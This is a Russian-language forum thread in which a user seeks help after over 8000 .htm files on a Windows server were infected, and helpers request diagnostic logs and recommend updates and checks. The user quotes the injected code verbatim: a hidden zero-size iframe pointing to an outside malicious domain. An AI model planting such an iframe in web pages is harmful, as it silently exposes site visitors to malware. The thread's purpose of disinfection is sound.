Нa Windows Server 2008 R2 64 Terminal антивирусом NOD32 обнаружено более 8000 .htm файлов зараженных Iframe.B.Gen
Визуально видно что к файлам добавлена строка:
p
<nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
1.Как почистить столько файлов без удаления?
2.Как найти виновника?
Помогите, pls!
hijackthis.log
virusinfo_syscheck.zip
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) MaeXtro, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Логи делали из терминальной сессии ? Если да, то необходимо переделать непосредственно за компьютером.
- - - Добавлено - - -
+ Сделайте полный образ автозапуска uVS
- Проведите процедуру, которая описана тут. Ссылку на результат проверки напишите в сообщении здесь.
Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.Сообщение от MaeXtro
1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.
+ Откройте файл ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.
http://files.mail.ru/6F1D4B520AD542C1979FA312BBA14032
- Проведите процедуру, которая описана тут. Ссылку на результат проверки напишите в сообщении здесь.
Антивирус сам блокирует вредоносные ссылки. Сайт tsm.25u... уже находится в списке вредоносных.
1) Если это среверная платформа, не предназначенная для постоянного использования пользователями интернета непосредственно с самого сервера, то почему не стоит специально предназначенный для серверных платформ антивирус ESET File Security?
Защитка оказалась слабовата
2) Предполагаю использование интернета непосредственно с сервера. Сопоставьте время обнаружения данных атак и журналов системы, кто был залогинен в тот момент на сервере.
+ Откройте файл ScanVuln.txt. Выполните из этого файла скрипт в AVZ. В результате работы скрипта будет создан файл - avz_log.txt.
Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления(если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.
Скрипт все время предлагает:
Несанкционированные цифровые сертификаты делают возможным подмену содержимого
http://download.microsoft.com/downlo...718704-x64.msu
а при установке система говорит, что уже обновлена
Извините лог не влез по размеру:
http://files.mail.ru/706C500FD7EA49A99650D85505F8FB7C
Уважаемый(ая) MaeXtro, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
